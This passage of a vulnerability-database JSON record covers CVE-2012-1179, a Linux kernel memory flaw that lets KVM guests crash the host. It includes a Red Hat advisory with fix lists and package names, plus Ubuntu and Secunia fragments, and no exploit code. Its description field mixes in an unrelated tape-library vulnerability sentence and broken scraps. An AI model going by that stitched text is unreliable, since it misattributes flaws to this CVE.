        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.3"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel -test9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#913483"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-1434"
      },
      {
        "db": "BID",
        "id": "52533"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002454"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201203-376"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-1179"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:rc7:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.3",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2012-1179"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ulrich Obergfell",
    "sources": [
      {
        "db": "BID",
        "id": "52533"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2012-1179",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 5.2,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 4.4,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:A/AC:M/Au:S/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Adjacent Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 5.2,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2012-1179",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:A/AC:M/Au:S/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2012-1179",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201203-376",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2012-1179",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2012-1179"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002454"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201203-376"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-1179"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The Linux kernel before 3.3.1, when KVM is used, allows guest OS users to cause a denial of service (host OS crash) by leveraging administrative access to the guest OS, related to the pmd_none_or_clear_bad function and page faults for huge pages. Cross scripting and preconfigured password vulnerabilities have been reported to exist in the Quantum Scalar i500, Dell ML6000 and IBM TS3310 tape libraries. The Linux kernel is prone to a local denial-of-service vulnerability. \nAttackers can exploit this issue to cause the kernel to crash, denying service to legitimate users. \nLinux Kernel 2.6.x is vulnerable. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2012:0743-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2012-0743.html\nIssue date:        2012-06-18\nCVE Names:         CVE-2012-0044 CVE-2012-1179 CVE-2012-2119 \n                   CVE-2012-2121 CVE-2012-2123 CVE-2012-2136 \n                   CVE-2012-2137 CVE-2012-2372 CVE-2012-2373 \n=====================================================================\n\n1. Summary:\n\nUpdated kernel packages that fix multiple security issues and several bugs\nare now available for Red Hat Enterprise Linux 6. \n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. \n\nThis update fixes the following security issues:\n\n* A local, unprivileged user could use an integer overflow flaw in\ndrm_mode_dirtyfb_ioctl() to cause a denial of service or escalate their\nprivileges. (CVE-2012-0044, Important)\n\n* A buffer overflow flaw was found in the macvtap device driver, used for\ncreating a bridged network between the guest and the host in KVM\n(Kernel-based Virtual Machine) environments. A privileged guest user in a\nKVM guest could use this flaw to crash the host. Note: This issue only\naffected hosts that have the vhost_net module loaded with the\nexperimental_zcopytx module option enabled (it is not enabled by default),\nand that also have macvtap configured for at least one guest. \n(CVE-2012-2119, Important)\n\n* When a set user ID (setuid) application is executed, certain personality\nflags for controlling the application\u0027s behavior are cleared (that is, a\nprivileged application will not be affected by those flags). It was found\nthat those flags were not cleared if the application was made privileged\nvia file system capabilities. A local, unprivileged user could use this\nflaw to change the behavior of such applications, allowing them to bypass\nintended restrictions. Note that for default installations, no application\nshipped by Red Hat for Red Hat Enterprise Linux is made privileged via file\nsystem capabilities. (CVE-2012-2123, Important)\n\n* It was found that the data_len parameter of the sock_alloc_send_pskb()\nfunction in the Linux kernel\u0027s networking implementation was not validated\nbefore use. A privileged guest user in a KVM guest could use this flaw to\ncrash the host or, possibly, escalate their privileges on the host. \n(CVE-2012-2136, Important)\n\n* A buffer overflow flaw was found in the setup_routing_entry() function in\nthe KVM subsystem of the Linux kernel in the way the Message Signaled\nInterrupts (MSI) routing entry was handled. A local, unprivileged user\ncould use this flaw to cause a denial of service or, possibly, escalate\ntheir privileges. (CVE-2012-2137, Important)\n\n* A race condition was found in the Linux kernel\u0027s memory management\nsubsystem in the way pmd_none_or_clear_bad(), when called with mmap_sem in\nread mode, and Transparent Huge Pages (THP) page faults interacted. A\nprivileged user in a KVM guest with the ballooning functionality enabled\ncould potentially use this flaw to crash the host. A local, unprivileged\nuser could use this flaw to crash the system. (CVE-2012-1179, Moderate)\n\n* A flaw was found in the way device memory was handled during guest device\nremoval. Upon successful device removal, memory used by the device was not\nproperly unmapped from the corresponding IOMMU or properly released from\nthe kernel, leading to a memory leak. A malicious user on a KVM host who\nhas the ability to assign a device to a guest could use this flaw to crash\nthe host. (CVE-2012-2121, Moderate)\n\n* A flaw was found in the Linux kernel\u0027s Reliable Datagram Sockets (RDS)\nprotocol implementation. A local, unprivileged user could use this flaw to\ncause a denial of service. (CVE-2012-2372, Moderate)\n\n* A race condition was found in the Linux kernel\u0027s memory management\nsubsystem in the way pmd_populate() and pte_offset_map_lock() interacted on\n32-bit x86 systems with more than 4GB of RAM. A local, unprivileged user\ncould use this flaw to cause a denial of service. (CVE-2012-2373, Moderate)\n\nRed Hat would like to thank Chen Haogang for reporting CVE-2012-0044. \n\nThis update also fixes several bugs. Documentation for these changes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section. \n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues, and fix the bugs noted in the Technical\nNotes. The system must be rebooted for this update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously-released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/knowledge/articles/11258\n\nTo install kernel packages manually, use \"rpm -ivh [package]\". Do not\nuse \"rpm -Uvh\" as that will remove the running kernel binaries from\nyour system. You may use \"rpm -e\" to remove old kernels after\ndetermining that the new kernel functions properly on your system. \n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n772894 - CVE-2012-0044 kernel: drm: integer overflow in drm_mode_dirtyfb_ioctl()\n803793 - CVE-2012-1179 kernel: thp:__split_huge_page() mapcount != page_mapcount BUG_ON()\n806722 - CVE-2012-2123 kernel: fcaps: clear the same personality flags as suid when fcaps are used\n814149 - CVE-2012-2121 kvm: device assignment page leak\n814278 - CVE-2012-2119 kernel: macvtap: zerocopy: vector length is not validated before pinning user pages\n814657 - kernel crash at ieee80211_mgd_probe_ap_send [rhel-6.2.z]\n816151 - CVE-2012-2137 kernel: kvm: buffer overflow in kvm_set_irq()\n816226 - add option to disable 5GHz band to iwlwifi [rhel-6.2.z]\n816289 - CVE-2012-2136 kernel: net: insufficient data_len validation in sock_alloc_send_pskb()\n818504 - Disable LRO for all NICs that have LRO enabled [rhel-6.2.z]\n818505 - xen: fix drive naming [rhel-6.2.z]\n819614 - 2.6.32-220 kernel does not work on a HP DL385G6 with HP Smart Array P410 controller and hpsa driver [rhel-6.2.z]\n822754 - CVE-2012-2372 kernel: rds-ping cause kernel panic\n822821 - CVE-2012-2373 kernel: mm: read_pmd_atomic: 32bit PAE pmd walk vs pmd_populate SMP race condition\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-220.23.1.el6.i686.rpm\nkernel-debug-2.6.32-220.23.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-220.23.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-220.23.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-220.23.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-220.23.1.el6.i686.rpm\nkernel-devel-2.6.32-220.23.1.el6.i686.rpm\nkernel-headers-2.6.32-220.23.1.el6.i686.rpm\nperf-2.6.32-220.23.1.el6.i686.rpm\nperf-debuginfo-2.6.32-220.23.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm\n\nnoarch:\nkernel-doc-2.6.32-220.23.1.el6.noarch.rpm\nkernel-firmware-2.6.32-220.23.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debug-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-devel-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-headers-2.6.32-220.23.1.el6.x86_64.rpm\nperf-2.6.32-220.23.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm\n\ni386:\nkernel-debug-debuginfo-2.6.32-220.23.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-220.23.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-220.23.1.el6.i686.rpm\nperf-debuginfo-2.6.32-220.23.1.el6.i686.rpm\npython-perf-2.6.32-220.23.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\npython-perf-2.6.32-220.23.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm\n\nnoarch:\nkernel-doc-2.6.32-220.23.1.el6.noarch.rpm\nkernel-firmware-2.6.32-220.23.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debug-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-devel-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-headers-2.6.32-220.23.1.el6.x86_64.rpm\nperf-2.6.32-220.23.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\npython-perf-2.6.32-220.23.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-220.23.1.el6.i686.rpm\nkernel-debug-2.6.32-220.23.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-220.23.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-220.23.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-220.23.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-220.23.1.el6.i686.rpm\nkernel-devel-2.6.32-220.23.1.el6.i686.rpm\nkernel-headers-2.6.32-220.23.1.el6.i686.rpm\nperf-2.6.32-220.23.1.el6.i686.rpm\nperf-debuginfo-2.6.32-220.23.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm\n\nnoarch:\nkernel-doc-2.6.32-220.23.1.el6.noarch.rpm\nkernel-firmware-2.6.32-220.23.1.el6.noarch.rpm\n\nppc64:\nkernel-2.6.32-220.23.1.el6.ppc64.rpm\nkernel-bootwrapper-2.6.32-220.23.1.el6.ppc64.rpm\nkernel-debug-2.6.32-220.23.1.el6.ppc64.rpm\nkernel-debug-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm\nkernel-debug-devel-2.6.32-220.23.1.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-220.23.1.el6.ppc64.rpm\nkernel-devel-2.6.32-220.23.1.el6.ppc64.rpm\nkernel-headers-2.6.32-220.23.1.el6.ppc64.rpm\nperf-2.6.32-220.23.1.el6.ppc64.rpm\nperf-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm\n\ns390x:\nkernel-2.6.32-220.23.1.el6.s390x.rpm\nkernel-debug-2.6.32-220.23.1.el6.s390x.rpm\nkernel-debug-debuginfo-2.6.32-220.23.1.el6.s390x.rpm\nkernel-debug-devel-2.6.32-220.23.1.el6.s390x.rpm\nkernel-debuginfo-2.6.32-220.23.1.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-220.23.1.el6.s390x.rpm\nkernel-devel-2.6.32-220.23.1.el6.s390x.rpm\nkernel-headers-2.6.32-220.23.1.el6.s390x.rpm\nkernel-kdump-2.6.32-220.23.1.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-220.23.1.el6.s390x.rpm\nkernel-kdump-devel-2.6.32-220.23.1.el6.s390x.rpm\nperf-2.6.32-220.23.1.el6.s390x.rpm\nperf-debuginfo-2.6.32-220.23.1.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-220.23.1.el6.s390x.rpm\n\nx86_64:\nkernel-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debug-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-devel-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-headers-2.6.32-220.23.1.el6.x86_64.rpm\nperf-2.6.32-220.23.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm\n\ni386:\nkernel-debug-debuginfo-2.6.32-220.23.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-220.23.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-220.23.1.el6.i686.rpm\nperf-debuginfo-2.6.32-220.23.1.el6.i686.rpm\npython-perf-2.6.32-220.23.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm\n\nppc64:\nkernel-debug-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-220.23.1.el6.ppc64.rpm\nperf-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm\npython-perf-2.6.32-220.23.1.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm\n\ns390x:\nkernel-debug-debuginfo-2.6.32-220.23.1.el6.s390x.rpm\nkernel-debuginfo-2.6.32-220.23.1.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-220.23.1.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-220.23.1.el6.s390x.rpm\nperf-debuginfo-2.6.32-220.23.1.el6.s390x.rpm\npython-perf-2.6.32-220.23.1.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-220.23.1.el6.s390x.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\npython-perf-2.6.32-220.23.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-220.23.1.el6.i686.rpm\nkernel-debug-2.6.32-220.23.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-220.23.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-220.23.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-220.23.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-220.23.1.el6.i686.rpm\nkernel-devel-2.6.32-220.23.1.el6.i686.rpm\nkernel-headers-2.6.32-220.23.1.el6.i686.rpm\nperf-2.6.32-220.23.1.el6.i686.rpm\nperf-debuginfo-2.6.32-220.23.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm\n\nnoarch:\nkernel-doc-2.6.32-220.23.1.el6.noarch.rpm\nkernel-firmware-2.6.32-220.23.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debug-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-devel-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-headers-2.6.32-220.23.1.el6.x86_64.rpm\nperf-2.6.32-220.23.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm\n\ni386:\nkernel-debug-debuginfo-2.6.32-220.23.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-220.23.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-220.23.1.el6.i686.rpm\nperf-debuginfo-2.6.32-220.23.1.el6.i686.rpm\npython-perf-2.6.32-220.23.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\npython-perf-2.6.32-220.23.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2012-0044.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-1179.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-2119.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-2121.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-2123.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-2136.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-2137.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-2372.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-2373.html\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Linux/6/html/6.2_Technical_Notes/kernel.html#RHSA-2012-0743\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e.  More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2012 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFP3zJcXlSAg2UNWIIRAlFPAJ9ov0UCSkIqz63r+6YXL9bf0+ADOQCfUIzx\nw/ZsFuOkCnr15/XGPkEszEQ=\n=D/pm\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. (CVE-2012-0045)\n\nA flaw was discovered in the Linux kernel\u0027s cifs file system. (CVE-2012-1090)\n\nH. \n(CVE-2012-1097)\n\nA flaw was discovered in the Linux kernel\u0027s cgroups subset. (CVE-2012-1146)\n\nA flaw was found in the Linux kernel\u0027s handling of paged memory. (CVE-2012-1179)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 11.10:\n  linux-image-3.0.0-19-generic    3.0.0-19.33\n  linux-image-3.0.0-19-generic-pae  3.0.0-19.33\n  linux-image-3.0.0-19-omap       3.0.0-19.33\n  linux-image-3.0.0-19-powerpc    3.0.0-19.33\n  linux-image-3.0.0-19-powerpc-smp  3.0.0-19.33\n  linux-image-3.0.0-19-powerpc64-smp  3.0.0-19.33\n  linux-image-3.0.0-19-server     3.0.0-19.33\n  linux-image-3.0.0-19-virtual    3.0.0-19.33\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. Unless you\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\nlinux-server, linux-powerpc), a standard system upgrade will automatically\nperform this as well. ----------------------------------------------------------------------\n\nBecome a PSI 3.0 beta tester!\nTest-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. \nDownload it here!\nhttp://secunia.com/psi_30_beta_launch\n\n----------------------------------------------------------------------\n\nTITLE:\nUbuntu update for linux-lts-backport-oneiric\n\nSECUNIA ADVISORY ID:\nSA48987\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/48987/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48987\n\nRELEASE DATE:\n2012-05-01\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/48987/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/48987/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48987\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nUbuntu has issued an update for linux-lts-backport-oneiric. \n\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nORIGINAL ADVISORY:\nUSN-1433-1:\nhttps://lists.ubuntu.com/archives/ubuntu-security-announce/2012-May/001672.html\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to 